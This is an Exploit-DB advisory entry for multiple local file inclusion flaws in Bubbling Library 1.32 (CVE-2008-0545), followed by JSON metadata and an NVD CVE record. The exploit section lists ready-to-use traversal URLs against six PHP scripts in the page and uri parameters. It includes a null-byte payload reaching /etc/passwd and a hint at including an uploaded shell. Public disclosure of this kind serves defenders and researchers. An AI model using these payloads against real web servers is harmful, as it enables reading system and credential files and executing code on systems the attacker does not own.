Bubbling Library 1.32 - Multiple Local File Inclusion Vulnerabilities
2008-01-26T00:00:00
ID EDB-ID:4991 Type exploitdb Reporter Stack Modified 2008-01-26T00:00:00
Description
Bubbling Library 1.32 Multiple Local File Inclusion Vulnerabilities. CVE-2008-0545. Webapps exploit for php platform
## bubbling library v1.32 multiple Local File Inclusion Vulnerabilities
## Download scrip : http://sourceforge.net/project/showfiles.php?group_id=192730
## Author : Stack-Terrorist [v40]
## Email : v.4@hotmail.fr
## Home : http://www.v4-team.com
## for execute exploit does not write extention of file
## Other files: =../../../../etc/passwd%00
## exploit :
#
# examples/dispatcher/framework/simple.php?page=[local file]&tpl=ajax
http://localhost/ [script] /examples/dispatcher/framework/simple.php?page=../[name of file wthout php]
http://localhost/ [script] /examples/dispatcher/framework/yui-menu.php?page=../[name of file wthout php]
http://localhost/ [script] /examples/dispatcher/framework/advanced.tpl.php?uri=../[name of file wthout php]
# examples/dispatcher/framework/simple.php?page=/home/user/shell
http://localhost/ [script] /examples/dispatcher/framework/yui-menu.tpl.php?uri=../[name of file wthout php]
http://localhost/ [script] /examples/dispatcher/framework/simple.tpl.php?uri=../[name of file wthout php]
http://localhost/ [script] /examples/dispatcher/framework/advanced.php?page=../[name of file wthout php]
Greetz : H-T Team , v4 Team , Tryag , no-hack all my friend
Special tnx for : Houssamix
thx for: Proamk - djekmani - Jadi - Bohayra - MR.safa7 -Hack3r-b0y - str0ke
# milw0rm.com [2008-01-26]
{"id": "EDB-ID:4991", "hash": "fabd737b82902ebd4fa51861eb470c00", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Bubbling Library 1.32 - Multiple Local File Inclusion Vulnerabilities", "description": "Bubbling Library 1.32 Multiple Local File Inclusion Vulnerabilities. CVE-2008-0545. Webapps exploit for php platform", "published": "2008-01-26T00:00:00", "modified": "2008-01-26T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/4991/", "reporter": "Stack", "references": [], "cvelist": ["CVE-2008-0545"], "lastseen": "2016-01-31T22:16:06", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2016-01-31T22:16:06"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-0545"]}], "modified": "2016-01-31T22:16:06"}, "vulnersScore": 6.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/4991/", "sourceData": "## bubbling library v1.32 multiple Local File Inclusion Vulnerabilities \n## Download scrip : http://sourceforge.net/project/showfiles.php?group_id=192730\n## Author : Stack-Terrorist [v40]\n## Email : v.4@hotmail.fr\n\n## Home : http://www.v4-team.com\n## for execute exploit does not write extention of file\n## Other files: =../../../../etc/passwd%00 \n## exploit :\n# \n# examples/dispatcher/framework/simple.php?page=[local file]&tpl=ajax\nhttp://localhost/ [script] /examples/dispatcher/framework/simple.php?page=../[name of file wthout php]\nhttp://localhost/ [script] /examples/dispatcher/framework/yui-menu.php?page=../[name of file wthout php]\nhttp://localhost/ [script] /examples/dispatcher/framework/advanced.tpl.php?uri=../[name of file wthout php]\n# examples/dispatcher/framework/simple.php?page=/home/user/shell\nhttp://localhost/ [script] /examples/dispatcher/framework/yui-menu.tpl.php?uri=../[name of file wthout php]\nhttp://localhost/ [script] /examples/dispatcher/framework/simple.tpl.php?uri=../[name of file wthout php]\nhttp://localhost/ [script] /examples/dispatcher/framework/advanced.php?page=../[name of file wthout php]\n\nGreetz : H-T Team , v4 Team , Tryag , no-hack all my friend \nSpecial tnx for : Houssamix\nthx for: Proamk - djekmani - Jadi - Bohayra - MR.safa7 -Hack3r-b0y - str0ke \n\n# milw0rm.com [2008-01-26]\n", "osvdbidlist": ["41181", "41180", "41185", "41182", "41184", "41183"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:09:25", "bulletinFamily": "NVD", "description": "Multiple directory traversal vulnerabilities in Bubbling Library 1.32 allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the (1) uri parameter to (a) yui-menu.tpl.php, (b) simple.tpl.php, and (c) advanced.tpl.php in dispatcher/framework/; and the (2) page parameter to (d) yui-menu.php, (e) simple.php, and (f) advanced.php in dispatcher/framework/, different vectors than CVE-2008-0521.", "modified": "2017-09-29T01:30:00", "id": "CVE-2008-0545", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0545", "published": "2008-02-01T20:00:00", "title": "CVE-2008-0545", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}